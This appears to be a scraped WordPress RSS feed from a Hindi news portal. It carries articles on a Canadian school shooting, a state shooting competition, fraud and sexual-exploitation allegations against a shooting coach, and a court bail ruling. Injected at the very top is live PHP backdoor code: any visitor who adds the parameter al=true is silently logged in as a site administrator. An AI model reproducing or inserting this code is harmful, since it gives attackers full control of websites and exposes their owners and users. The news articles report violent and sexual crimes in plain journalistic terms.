// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); shooting – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Wed, 11 Feb 2026 05:46:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 कनाडा में स्कूल शूटिंग से दहशत: टंबलर रिज में शूटर समेत 9 की मौत, 25 घायल https://pratyushaashakinayikiran.com/?p=196962 Wed, 11 Feb 2026 05:46:00 +0000 https://pratyushaashakinayikiran.com/?p=196962 टंबलर रिज

कनाडा के ब्रिटिश कोलंबिया (BC) प्रांत के टंबलर रिज शहर से एक दिल दहला देने वाली घटना सामने आई है. मंगलवार को एक माध्यमिक स्कूल और एक रिहायशी घर में गोलीबारी हुई, जिसमें हमलावर समेत कुल 7 लोगों की मौत हो गई. वहीं, इस फायरिंग में 25 लोग घायल भी हो गए. 

रॉयल कैनेडियन माउंटेड पुलिस (RCMP) के मुताबिक, दोपहर लगभग 1:20 बजे 'टंबलर रिज सेकेंडरी स्कूल' में एक सक्रिय शूटर के होने की रिपोर्ट मिली. पुलिस ने तुरंत कार्रवाई करते हुए इलाके में 'पुलिस इनिशिएटेड पब्लिक अलर्ट' (PIPA) जारी किया और स्कूल को चारों ओर से घेर लिया.

स्कूल में दाखिल होने पर पुलिस अधिकारियों को 7 लोगों के शव मिले. पुलिस अधिकारी ने बताया कि एक संदिग्ध के मारे जाने की आशंका है, लेकिन अभी इस बात की जांच की जा रही है कि क्या कोई दूसरा हमलावर भी इस घटना में शामिल है. 

स्कूल और घर से 9 शव बरामद

जांच में स्कूल से जुड़ी इस घटना के तार एक स्थानीय निवास से भी जुड़ा पाए गए. वहां तलाशी के दौरान पुलिस को दो और लोगों के शव बरामद हुए. स्थिति को काबू में देख पुलिस ने शाम 5:45 बजे पब्लिक अलर्ट वापस ले लिया था और अब आगे की जांच जारी है. पुलिस हमलावर के मकसद पता लगाने की कोशिश कर रही है.

लोगों को घरों में रहने की सलाह

इस मामले की गंभीरता को देखते हुए 'BC RCMP मेजर क्राइम' विभाग ने जांच की कमान संभाल ली है. इलाके में इमरजेंसी रिस्पांस टीम और फ्रंटलाइन अधिकारियों के साथ-साथ विक्टिम सर्विसेज को भी तैनात किया गया है, ताकि प्रभावित परिवारों को मानसिक और सामाजिक सहायता प्रदान की जा सके.

कस्बे की करीब 2400 की आबादी को घरों के अंदर रहने की सलाह दी गई है, क्योंकि पड़ोसी इलाकों से अतिरिक्त पुलिस बल बुलाया गया है.

बंद किए गए सेकेंडरी और एलिमेंट्री स्कूल

सुरक्षा के मद्देनजर टंबलर रिज के सेकेंडरी और एलिमेंट्री दोनों स्कूलों को फिलहाल बंद कर दिया गया है. स्थानीय विधायक लैरी न्यूफेल्ड ने जानकारी दी है कि समुदाय की मदद के लिए बड़ी संख्या में पुलिस (RCMP) और एम्बुलेंस की टीमें तैनात की गई हैं. उन्होंने सुरक्षा कारणों से फिलहाल ज्यादा जानकारी साझा करने से मना किया है, ताकि चल रहे ऑपरेशन में कोई परेशानी न आए. 

]]>
24वीं राज्य निशानेबाजी प्रतियोगिता का शुभारंभ https://pratyushaashakinayikiran.com/?p=181476 Fri, 29 Aug 2025 05:20:00 +0000 https://pratyushaashakinayikiran.com/?p=181476 24वीं राज्य निशानेबाजी प्रतियोगिता का शुभारंभ 

छत्तीसगढ़ में गूंजेगी निशानों की गूंज, 24वीं राज्य स्तरीय प्रतियोगिता का शुभारंभ

छत्तीसगढ़ राज्य निशानेबाजी संघ के तत्वाधान में 24वीं राज्य स्तरीय निशानेबाजी प्रतियोगिता की हुई शुरुआत
रायपुर

छत्तीसगढ़ राज्य निशानेबाजी संघ के तत्वाधान में 24वीं राज्य स्तरीय निशानेबाजी प्रतियोगिता की शुरुआत 28अगस्त को हुई। माना स्थित चौथी बटालियन के शूटिंग रेंज में इसकी शुरुआत की गई।

ये प्रतियोगिता लगातार पिछले 23वर्षों से सफलता पूर्वक जिंदल समूह के सौजन्य से आयोजित की जा रही है प्रतियोगिता की शुरुआत मुख्य अतिथि श्री अरुण देव गौतम पुलिस महानिदेशक छ. ग शासन द्वारा की गई उन्होंने सभी रेंज को गौर से देखा और उन्होंने शूटिंग ट्रायल से प्रतियोगिता की शुरुआत की।उन्होंने छत्तीसगढ़ प्रदेश रायफल एसोसिएशन के इस आयोजन के लिए उन्हें बधाई दी और कहा कि यूथ को शूटिंग को भी एक नेचुरल स्पोर्ट्स की तरह देखना चाहिए और यूथ को इसमें आगे आना चाहिए ऐसे आयोजन से निश्चित तौर पर छत्तीसगढ़ की खिलाड़ियों को एक नई दिशा मिलेगी।

वही विशिष्ट अतिथि ब्रिगेडियर टी. एस.बावा कोसा कमांडर ने जिंदल के इस शूटिंग आयोजन के लिए उनकी सराहना की साथ ही उन्होंने कहा कि छत्तीसगढ़ में टैलेंट की कमी नहीं हैं हमें जरूरत हैं उन प्रतिभाओं को निखारने और सामने लाने की ।

इस आयोजन से छत्तीसग़ढ राज्य के खिलाड़ी राज्य में ही नहीं बल्कि राष्ट्रीय के लिए भी अपनी तैयारी कर सकेंगे।

इस आयोजन में श्री विक्रम सिसोदिया सेक्रेटरी जनरल छ .ग़ ओलंपिक संघ एवं श्री पुष्कर शर्मा भी मुख्य अतिथि शामिल हुए  साथ ही जिंदल स्टील के प्रेसिडेंट श्री प्रदीप टंडन,श्री उदय प्रताप सिंह व छत्तीसगढ़ प्रदेश रायफल एसोसिएशन के अधिकारी मौजूद रहे।
ये प्रतियोगिता आगामी 6 सितंबर तक चलेगी। जिसमें छत्तीसगढ़ के सभी जिलों से आए शूटर्स इसमें भाग ले रहे हैं।
इसमें 50मीटर,25मीटर और 10मीटर की रायफल शूटिंग के अलावा पिस्टल की प्रतियोगिताये भी आयोजित की जाएंगी। जिसमें महिला, पुरूष दोनों वर्गों में ये प्रतियोगिता आयोजित की जाएगी।

]]>
शूटिंग कोचिंग के संचालक मोहसिन पर महिला मित्र के साथ मिलकर युवती को ठगने का भीआरोप https://pratyushaashakinayikiran.com/?p=160490 Sat, 31 May 2025 10:38:00 +0000 https://pratyushaashakinayikiran.com/?p=160490 इंदौर

ड्रीम ओलंपिक शूटिंग एकेडमी के कोच मोहसिन खान के खिलाफ अन्नपूर्णा थाना पुलिस ने एक और केस दर्ज किया है। कुल सात केस अब हो चुके हैं। मोहसिन ने एक युवती से शूटिंग रेंज खोलने और उसे बंदूक दिलाने के नाम पर लाखों रुपए ऐंठे और पैसों की बारिश कराने के नाम पर एक महिला और दर्जनभर पीर बाबा से तंत्र क्रिया करवाई। एक युवक से संबंध बनाने का दबाव बनाया। जान से मारने की धमकी दी।

इंदौर के ड्रीम ओलिंपिक शूटिंग एकेडमी के कोच मोहसिन खान के खिलाफ अन्नपूर्णा थाना थाने में एक और एफआईआर दर्ज की गई है। अब उस पर तंत्र-मंत्र कर रेप और धोखाधड़ी का मामला दर्ज किया गया है। पीड़िता ने शुक्रवार को अन्नपूर्णा थाने में शिकायत की थी।

.पीड़िता ने पुलिस को बताया कि उसे टेली कॉलिंग का विज्ञापन दिखाकर कोचिंग जॉइन कराया था। इसके बाद मोहसिन ने शूटिंग रेंज का लाइसेंस दिलाने के नाम पर लाखों रुपए ठग लिए। तंत्र-मंत्र के जरिए नोटों की बारिश का झांसा देकर फॉर्म हाउस ले गया। पूरे शरीर पर इत्र लगाया और वर्जीनिटी टेस्ट कराया। तंत्र क्रिया के दौरान कहा था कि जिन्न को खुश करने के लिए दुल्हन की तरह सजकर आना। अगर वह खुश हो गया तो नोटों की बारिश कर देगा।

पुलिस मोहसिन से इस मामले को लेकर भी पूछताछ कर रही है। बता दें, मोहसिन पर अब तक 7 एफआईआर हो चुकी हैं।

मोहसिन कहता था करियर बना दूंगा अन्नपूर्णा पुलिस के मुताबिक 30 साल की महिला ने अपनी शिकायत में बताया कि वह एमआर 6 इलाके में रहती है। उसे जानकारी लगी थी कि ड्रीम ओलिंपिक एकेडमी में काम के लिए महिलाओं की जरूरत है। जून 2020 में एकेडमी में संपर्क किया। इंटरव्यू के बाद सिलेक्शन हो गया।

तुम पर होगी नोटों की बारिश
पीड़िता के मुताबिक, ड्रीम ओलंपिक में वह नौकरी के लिए एक विज्ञापन के माध्यम से पहुंची थी। मोहसिन ने काम की तारीफ करते हुए कहा कि तुम शूटिंग सीख लो। मुझे शूटिंग रेंज खुलवाने का लालच दिया। इसके बदले लाखों रुपए लिए। कहा कि रेंज खोलने के लिए और पैसों की जरूरत पड़ेगी। मोहसिन ने महिला से मिलवाया और कहा, तु्म्हें जिन्न(Genie) को खुश करने के लिए बुधवार को दुल्हन जैसी सज कर आना होगा। जिन्न मेहरबान हुआ तो तुम पर नोटों की बारिश होगी। महिला ने ऐसा वीडियो दिखाया था। मोहसिन मुझे हवा बंगला स्थित फार्म हाऊस ले गया।

ध्यान लगाओ, जिन्न मेहरबान होने वाला है…
महिला ने इत्र लगाकर कहा कि वर्जिनिटी टेस्ट कराना होगा। मैं कमरे में गई तो 10 से 12 पीर बाबा थे। एक ने लोबान जलाकर कहा, ध्यान लगाओ, जिन्न मेहरबान होने वाला है। मेरा ध्यान एकत्रित नहीं हुआ तो पीर बाबा ने मोहसिन और साधना जोहरी से कहा कि यह लड़की हमारे काम की नहीं है। इसे वापस ले जाओ नहीं तो जिन्न नाराज हो जाएगा और हम बर्बाद हो जाएंगे।

दोस्त से संबंध बनाने का दबाव

तंत्र क्रिया के अगले दिन मोहसिन  ने मुझसे कहा, इस काम में मेरे 20 लाख रुपए बर्बाद हो गए। तुहारे कारण नोटों की बारिश नहीं हुई है। मुझे फैजान खान से मिलवाया और बोला जो बीत गया उसे भूल जाओ, अपनी शूटिंग एकेडमी खोलने के लिए आगे की तैयारी करो। मोहसिन ने कहा कि फैजान से रिलेशन बना लो। मैंने जॉब छोड़कर थाने में शिकायत का मन बनाया था, लेकिन मोहसिन का मुझे लोगों ने डर दिखाया। मोहसिन के कारनामे उजागर हुए और उसकी जानकारी मिली, इस पर थाने आकर शिकायत की है।

युवती की शिकायत के आधार पर धोखाधड़ी, धमकी सहित अन्य धाराओं में केस दर्ज किया है। इसके साथ ही मोहसिन और उसके अन्य साथी से पूछताछ चल रही है। अन्य आरोपी की तलाश की जा रही है।- अजय नायर,थाना प्रभारी, अन्नपूर्णा

काम के साथ-साथ मोहसिन शूटिंग भी सिखाने लगा। वह काम की तारीफ भी करता था। कहता था कि नौकरी करते रहोगी तो शूटिंग सिखा दूंगा। करियर बना दूगा। शूटिंग रेंज का लाइसेंस दिलाकर तुम्हारी खुद की रेंज खुलवा दूंगा।

इस बीच उसने पीड़िता से जरूरत का कहकर 4 लाख रुपए की मांग की। उसकी बातों में आकर पीड़िता ने 4 मार्च 2021 को 50 हजार नकदी और 7 मार्च को फिर से 3 लाख 50 हजार नकदी दे दिए गए। इसके बाद मार्च में ही मोहसिन का 2 लाख 50 हजार रुपए का क्रेडिट कार्ड का बिल पीड़िता ने ही भरा।

इसके बाद मोहसिन से कहा कि रुपए के लेन-देन को लेकर बैंक का अकांउट नंबर दे दो। तब उसने कहा कि वह ओवर लिमिट हो गया है। मोहसिन ने इसके बाद वहां काम करने वाली दो अन्य महिलाओं को 8 माह तक 9 और 12 हजार रुपए सैलरी दिलवाई।

फॉर्म हाउस पर ले गए, पूरे शरीर में इत्र लगाया पीड़िता ने अपनी शिकायत में बताया कि मोहसिन ने एक बार कहा कि रेंज खोलने के लिए लाइसेंस बन गया है। बंदूक भी ऑर्डर कर दी है। रेंज खोलने के लिए बड़ी जगह की जरूरत है। इसके लिए और रुपए लगेंगे। तब उसे कहा कि उसके पास रुपए नहीं है। पीड़िता को मोहसिन ने बताया कि उसके पास एक सॉल्यूशन है।

जिसमें शूटिंग रेंज खोलने का सपना पूरा हो जाएगा। इसके बाद मोहसिन ने साधना जौहरी नाम की महिला से मिलवाया ओर कहा कि उसने तंत्र क्रिया, जिन्न और पैसे की बारिश के बारे में बताया। जौहरी ने कहा कि जिन्न को खुश करने के लिए बुधवार को दुल्हन की तरह सजकर आना। जिन्न के साथ कुछ समय बिताकर उसे खुश करना पड़ेगा।

जिन्न तुम पर खुश हो गया तो नोटों की बारिश होगी। साधना ने एक वीडियो बताया। जिसमें लड़की सज-धज कर लेटी है ओर नोटों की बारिश हो रही है। पूरा कमरा नोटों से भरा है।

पीड़िता ने बताया कि वीडियो देखकर बात को सच मान लिया। जिन्न के पास जाने के लिए हां कर दी। इसके बाद मोहसिन और हवा बंगला के पास रहने वाली साधना जौहरी एक फॉर्म हाउस पर लेकर गए। यहां एक अन्य लड़की थी। उसे भी इसी काम के लिए लेकर आया गया था। जौहरी इसके बाद एक कमरे में ले गई। यहां पूरे शरीर पर इत्र लगा दिया। इसके बाद कहा कि उसे इत्र बहुत पसंद है। वह खुश होकर नोटों की बारिश करेगा।

बाबाओं के पास ले जाने से पहले वर्जीनिटी टेस्ट कराया पीड़िता ने पुलिस को बताया कि फॉर्म हाउस ले जाने से पहले उसका वर्जीनिटी टेस्ट भी मोहसिन और साधना जौहरी ने करवाया था। जो सफल भी रहा। इसके बाद एक कमरे में पहुंची। यहां 10 से 12 लड़के पीर बाबा जैसे दिख रहे थे। इस दौरान काफी घबरा गई। तब एक पीर बाबा ने लोभान जलाकर सिर पर हाथ रखा और कहा कि ध्यान एकत्रित करो।

जिन्न तुम पर मेहरबान होने वाला है। इसके बाद ध्यान एकत्रित नहीं हुआ तो पीर बाबा ने मोहसिन और जौहरी से कहा कि ये कैसी लड़की को लेकर आए हो। इसका वर्जीनिटी टेस्ट करवाया कि नहीं। तब जौहरी ने कहा कि करवाया है। इसके बाद पीर बाबा ने कहा कि यह लड़की टमाटर है। हमारे काम नहीं आएगी।

इसे वापस ले जाओ। जिन्न हम पर नाराज हो जाएगा। हम सब बर्बाद हो जाएंगे। इसके बाद रात में मोहसिन और साधना जौहरी ने पीड़िता को उसके रूम पर लाकर छोड़ दिया।

मोहसिन बोला- 20 लाख रुपए बर्बाद हो गए अगले दिन मोहसिन से इन सब कामों को लेकर बात की तो उसने कहा कि इस काम में उसके 20 लाख रुपए बर्बाद हो गए। इस बात पर मोहसिन और उसके बीच झगड़ा हो गया। दो दिन तक रेंज पर नहीं गई तब मोहसिन ने कॉल कर बुलाया। उसने कहा जो हुआ भूल जाओ अपनी शूटिंग एकेडमी खोलने के लिए तैयारी करो।

इसके बाद फैजान से मिलाया गया और कहा कि वह मोहसिन का दोस्त है। अच्छी शूटिंग जानता है। जिम ट्रेनर भी है। शूटिंग रेंज खोलने में तुम्हारी मदद करेगा। इसके बाद फैजान 3 दिन तक केसरबाग इलाके की जिम लेकर गया। एक दिन मोहसिन ने कहा कि फैजान और तुम्हारी अच्छी दोस्ती हो गई है। तुम फैजान से संबंध बना लो।

पीड़िता ने अपनी शिकायत में बताया कि मैंने यह सब करने से इनकार कर दिया। मोहसिन के इरादे को भांप लिया और कहा कि मुझे कोई एकेडमी नहीं खोलना है। मेरे रुपए वापस कर दो। तब मोहसिन ने कहा कि कौन से रुपए तुम पर नोटों की बारिश करवाने के लिए साधना जौहरी पर 20 लाख रुपए खर्च कर दिए हैं। अब तुम मुझे मेरे 13 लाख रुपए वापस दो। बताओ कब रुपए लौटाओगी? यही नहीं मोहसिन ने शूटिंग रेंज में आने वाले बच्चे और उनके परिजन के सामने कहा कि इसका महंगे कपड़े और क्लब जाने पर रुपए खर्च करता रहा हूं।

बात सुनकर पीड़िता ने गुस्से में मोहसिन से कहा कि मैं तुम्हारे खिलाफ पुलिस में शिकायत करूंगी। तुमने तंत्र क्रिया के नाम पर 7 लाख रुपए हड़पे हैं। तुम वन्य जीवों को खरीदने बेचने का काम करते हो। बच्चियों से एकेडमी में हरकत करते हो। इसकी शिकायत करूंगी। इसके बाद मोहसिन ने धमकाया और कहा कि परिवार को कही रहने लायक नहीं रहने दूंगा।

इसके बाद मोहसिन के खिलाफ शिकायत करने जा रही थी। तब दोस्त ने समझाया कि तुम इंदौर में अकेली रहती हो। पिता हार्ट पेशेंट है। सब कुछ भूल जाना ही ठीक समझा। परिवार को भी इस घटना के बारे में नहीं बताया। दूसरी जगह जॉब करने लगी। पिछले दिनों मोहसिन को लेकर जानकारी मिली। इसके बाद हिम्मत कर थाने आकर मामले में केस दर्ज कराया।

]]>
जूनियर खिलाड़ी की आत्महत्या के लिए उकसाने के मामले में दिव्यांश ठाकुर को अग्रिम जमानत https://pratyushaashakinayikiran.com/?p=127869 Sat, 01 Feb 2025 19:36:00 +0000 https://pratyushaashakinayikiran.com/?p=127869 भोपाल

भोपाल स्थित एमपी शूटिंग अकादमी में जूनियर खिलाड़ी द्वारा खुद को गोली मारकर आत्महत्या करने के मामले में हाईकोर्ट ने सीनियर खिलाड़ी को अग्रिम जमानत प्रदान कर दी है। जस्टिस संजय द्विवेदी की एकलपीठ ने अपने आदेश में कहा कि आवेदक भी एक खिलाड़ी है और जेल भेजने से उसका भविष्य प्रभावित हो सकता है।

यह मामला 1 दिसंबर 2024 का है, जब 18 वर्षीय यथार्थ रघुवंशी ने खुद को गोली मारकर आत्महत्या कर ली थी। पुलिस ने मर्ग कायम कर मामले की जांच शुरू की। जांच के दौरान सामने आया कि सीनियर खिलाड़ी दिव्यांश ठाकुर (20) की कार से रुपये चोरी हो गए थे। घटना के समय यथार्थ उसी कार में कुछ सामान लेने गया था। इसके बाद दिव्यांश और उसके साथियों ने यथार्थ पर रुपये लौटाने का दबाव बनाया। पुलिस ने सुसाइड नोट, गवाहों और परिजनों के बयान के आधार पर दिव्यांश सहित अन्य के खिलाफ आत्महत्या के लिए उकसाने का मामला दर्ज किया था।

हाईकोर्ट ने अपने आदेश में कहा कि मृतक और आरोपी दोनों खिलाड़ी थे और एक-दूसरे को जानते थे। मृतक 18 वर्ष का था, जबकि आरोपी 20 वर्ष का है। चोरी का आरोप लगना किसी भी व्यक्ति के लिए अपमानजनक हो सकता है, और मानसिक रूप से दबाव झेलने की क्षमता हर व्यक्ति में अलग होती है। कुछ लोग ऐसे हालात से उबर जाते हैं, जबकि कुछ नहीं संभाल पाते।

न्यायालय ने कहा कि किसी की भावनाओं को आहत करने वाली घटनाओं में संतुलन बनाए रखना आवश्यक है। अपराध वास्तव में हुआ है या नहीं, यह जांच का विषय है, और किसी निर्दोष को सजा नहीं दी जानी चाहिए। आवेदक और अन्य सह-अभियुक्तों द्वारा मृतक पर पैसे लौटाने का दबाव बनाया गया था, लेकिन प्रथमदृष्टया यह तय करना कठिन है कि उनका इरादा ऐसा माहौल बनाने का था, जिसमें मृतक के पास आत्महत्या के अलावा कोई विकल्प न बचे।

एकलपीठ ने इसी आधार पर दिव्यांश ठाकुर को अग्रिम जमानत दे दी। साथ ही, उसे 50,000 रुपये के निजी बांड और इतनी ही राशि के एक सॉल्वेंट जमानत प्रस्तुत करने के आदेश दिए गए हैं।

 

]]>